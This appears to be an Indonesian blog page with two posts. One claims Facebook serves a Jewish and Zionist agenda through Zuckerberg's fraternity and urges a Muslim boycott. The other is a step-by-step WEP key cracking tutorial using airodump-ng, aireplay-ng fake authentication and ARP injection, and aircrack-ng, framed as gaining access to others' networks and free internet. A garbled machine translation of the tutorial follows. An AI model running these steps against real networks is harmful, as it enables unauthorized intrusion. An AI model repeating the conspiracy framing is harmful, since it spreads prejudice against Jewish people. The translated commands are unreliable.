Selasa, 17 Maret 2009

history FACEBOOK


Fakta - fakta :FACEBOOK

1. Facebook adalah milik Mark Zuckerberg, jika kita membaca artikel Mark Zuckerberg dalam bahasa Indonesia tidak diketahui secara lengkap siapakah dia. Kalau kita membaca artikel tentang Mark Zuckerberg dalam bahasa inggris terdapat lengkap data diri si pembuat facebook ini.

2. Siapakah sebenarnya si pendiri sekaligus CEO facebook ini? Dia adalah mahasiswa Harvard University dan aktif sebagai anggota Alpha Epsilon Pi. Apa Itu Alpha Epsilon Pi?.

3. Alpha Epsilon Pi adalah seperti perkumpulan mahasiswa yahudi di amerika utara, yang mempunyai misi sebagai berikut,Alpha Epsilon Pi, the Jewish Fraternity of North America, was founded to provide opportunities for Jewish men seeking the best possible college and fraternity experience. We have maintained the integrity of our purpose by strengthening our ties to the Jewish community and serving as a link between high school and career. Alpha Epsilon Pi develops leadership for the North American Jewish community at a critical time in a young man’s life. Alpha Epsilon Pi’s role is to encourage the Jewish student to remain dedicated to Jewish ideals, values, and ethics and to prepare the student to be one of tomorrow’s leaders so that he may help himself, his family, his community, and his people.Yang intinya adalah sebagai tempat pengkaderan dan tempat mencari pemimpin baru bagi kaumnya, yaitu Yahudi.

4. Facebook mendapatkan keuntungan dari iklan yang dipasang, semakin banyak user dan pengunjung facebook senakin banyak pula penghasilnya.

5. Hingga postingan ini dibuat, sudah lebih dari 1000 warga Palestina yang gugur dan terluka.Pertanyaan Yang Paling Besar Adalah-Sadarkah Kita?-Berapa Orang Muslim Sudah Mendaftarkan Diri Untuk Situs Ini?-Sudah Berapa Banyak Uang Yang Kita (Orang-Orang Muslim) Sumbangkan Untuk Kemaslahatan Zionis Yahudi?Jika Masih Ada Rasa Persaudaraan Dengan Saudaramu di Palestina...silahkan boikot (lakukan sebatas yang engkau mampu) barang-barang bermerek di bawah ini:

Rabu, 11 Maret 2009

Caranya membobol WEP keys

Pada kesempatan ini, sedikit ingin membahas bagaimana seseorang mampu menembus WEP key untuk mendapatkan akses ke dalam jaringan bahkan tidak tertutup kemungkinan untuk menggunakan internet gratis.
Mungkin ada yang bertanya, apa itu wep? Dan apa fungsi wep? Apa itu dhcp? Dan lain sebagainya.. tapi kali ini, saya hanya membahas mengenai wep key saja. Pada dasarnya setingan keamanan pada Akses Point (AP) terdiri dari beberapa mode, tetapi rata-rata menggunakan setingan yang simple untuk memudahkan pengaksessan. Karena terkadang semakin tinggi tingkat keamanan maka tingkat kenyamanan semakin berkurang. WEP adalah Wired Eqivalent Privacy, yang panjang key 64 bitnya hanya 10 digit bilangan heksadesimal atau 5 digit alpha-numeric, sedangkan untuk 128 bit key terdiri dari 26 digit heksadesimal atau 13 digit alpha-numeric. Algoritma pemograman wep tergolong ke dalam algoritma RC4, dimana terdapat kelemahan pada ekripsi ini yaitu adanya perulangan byte sehingga memungkinkan untuk dicrack jika variable ivs nya mencukupi.
Saat melakukan proses hacking wep, menggunakan OS linuk turunan slackware yaitu backtrack versi 2.0 Final, dan menggunakan laptop Compaq V3103TU Presario V3000 dan menggunakan usb wireless adapter DWL G-122 rec C v.3.0.
Secara umum langkah-langkahnya adalah sebagai berikut:
1. Jalankan OS Back Track v.2.0 Final dengan Laptop. Lalu cek konfigurasi adapater usb wifi dengan meggunakan shell.
Ketikkan:

Ifconfig rausb0

Iwconfig rausb0

2. Setelah konfigurasi selesai, lalu jalankan airodump-ng untuk mengetahui channel berapa yang aktif, apa nama ssidnya, mac /client berapa saja yang sudah konek, ada tidaknya filrtering mac, yang tentunya untuk memudahkan kita melakukan monitoring
dengan menggunakan shell ketikkan:

airodump-ng rausb0

3. Setelah mengetahui target berada di channel berapa, ssid nya apa, essid nya apa, ada tidaknya client yang konek, maka batalkan airodump-ng dari shell dengan menekan control+C. lalu misalnya kita ingin menyerang essid SSIDAP bssid 00:18:f8:36:83:47 operasinya di channel 8, maka untuk menangkap paket yang dipancarkan oleh AP (Access Point) tersebut maka jalankan perintah:

iwconfig rausb0 mode monitor channel 8

airodump-ng -- channel 8 --ivs -w namafile rausb0

shell ini jangan ditutup sampai mendapatkan key wep pada langkah aircrack-ng

4. Setelah itu, jika aktivitas lan sedikit, artinya tidak ada client yang connect, harus menggunakan Fake Authentification dengan membuka shell baru, lalu ketikkan:

Aireplay-ng -1 -30 -e SSIDAP –a 00:18:f8:36:83:47 -h (mac address yang di izinkan konek) rausb0

Lakukan fake authentification sampai muncul balasan jawaban:
Authentification successful
Keep live sending packet
Lakukan terus sampai mendapatkan key wep pada langkah aircrack-ng

5 Lalu jalan shell yang lain untuk melakukan injeksi arp request (dalam hal ini hanya card tertentu saja yang mendukung untuk melakukan injeksi), jalankan command:

Aireplay-ng -3 –b 00:18:f8:36:83:47 -h (mac address yang di izinkan konek) rausb0

Lalu tinggal menunggu agar paket arp injeksi terkirim dan paket arp request diterima, paket yang diterima berupa paket ivs ini akan tersimpan dalam file pertama tadi di atas ketika menjalan shell airodump-ng -- channel 8 --ivs -w namafile rausb0

6. Untuk ngecrack password wep, sambil menunggu paket yang terkumpul, jalan shell baru ketikkan

aircrack-ng –e SSIDAP -b 00:18:f8:36:83:47 (namafile).ivs

lalu aircrack-ng ini akan mencari semua kemungkinan key wepnya.
Tunggu sampai mendapat display

Key Found (B1:92:27:EF:6E) Probability 100%
7. matikan shell airodump-ng, aireplay-ng, lalu buka shell baru. Lalu lakukan otentifikasi dengan cara:

iwconfig rausb0 mode managed –e SSIDAP key B1:92:27:EF:6E

lalu lakukan otomatisasi dhcp dengan mengetikkan perintah:
dhcpcd rausb0

lalu lakukan ping ke salah satu web site misalnya:
ping yahoo.com

kalo jawaban dari ping TTL=bla bla berarti anda sudah terkoneksi ke internet

THE TRANSLATE IS...

Wednesday, 11 March 2009
Do break WEP keys
On this occasion, few want to discuss how someone is able to penetrate WEP key to gain access to the network does not even closed to the possibility to use the internet for free.
Which may have to ask, what is WEP? And what function WEP? What is dhcp? And so on .. but this time, I only discuss about the WEP key only. Basically, the security settings on the Access Point (AP) consists of several modes, but the average using the simple settings to make it easier to pengaksessan. Because sometimes the higher level of security then the comfort level is reduced. WEP is Wired Eqivalent Privacy, a long key 64 bitnya only 10-digit hexadecimal number or 5 digit alpha-numeric, while for 128-bit key consists of 26 hexadecimal digits or 13-digit alpha-numeric. WEP algorithm pemograman classified into the RC4 algorithm, where there are weaknesses in this ekripsi the recurrence of bytes, making it possible to dicrack variable ivs if its enough.
During the process of hacking WEP, linuk derived using the OS is slackware backtrack version 2.0 Final, and use the laptop V3103TU Compaq Presario V3000 and use the usb wireless adapter DWL-G 122 C rec v.3.0.
In general, the steps are as follows:
1. Back Track run OS v.2.0 Final with Laptops. Then check the configuration adapater with usb wifi meggunakan shell.
Type:

Ifconfig rausb0

Iwconfig rausb0

2. After configuration is complete, then run airodump-ng to find out how many channels are active, what name ssidnya, mac / client that is how it connect, there is not filrtering mac, which of course makes it easier for us to monitor
using the shell type:

airodump-ng rausb0

3. After knowing the target is in the channel, SSID it is, what its essid, there is not a client connect, then cancel airodump-ng from the shell by pressing control + C. ago for example we want to attack SSIDAP essid bssid 00:18: F8: 36:83:47 channel operating in the 8, then to catch the package that emanated by AP (Access Point) will execute the command:

iwconfig rausb0 mode monitor channel 8

airodump-ng - channel 8 - ivs-w filename rausb0

shell is not closed to get the WEP key step in the aircrack-ng

4. After that, if a little lan activity, meaning that no client connect, have to use the Fake Authentification with a new shell, then type:

Aireplay-ng -1 -30-e SSIDAP â € "a 00:18: F8: 36:83:47-h (mac address in the Allow connect) rausb0

Make fake authentification answers until a reply:
Authentification successful
Keep sending live packet
Do continue to get the WEP key step in the aircrack-ng

5 Then the shell is another way to do the injection ARP request (in this case the only card that supports a certain course to do the injection), run the command:

Aireplay-ng -3 â € "b 00:18: F8: 36:83:47-h (mac address in the Allow connect) rausb0

Then stay packages waiting to be sent and the ARP packet injection ARP request is received, the packet is received a packet ivs will be saved in a file before the first run when the shell airodump-ng - channel 8 - ivs-w filename rausb0

6. To ngecrack WEP password, pending the packet collected, new road shell type

aircrack-ng â € "e SSIDAP-b 00:18: F8: 36:83:47 (filename). ivs

ago aircrack-ng will explore all possible key wepnya.
Wait until the display gets

Found Key (B1: 92:27: EF: 6E) Probability 100%
7. turn off the shell airodump-ng, aireplay-ng, and open a new shell. Then how do Authentication with:

iwconfig rausb0 mode managed â € "e SSIDAP key B1: 92:27: EF: 6E

ago do automation dhcp command by typing:
dhcpcd rausb0

ago to do a ping to the web site for example:
ping yahoo.com

I answer from ping TTL = bla bla means you are connected to the internet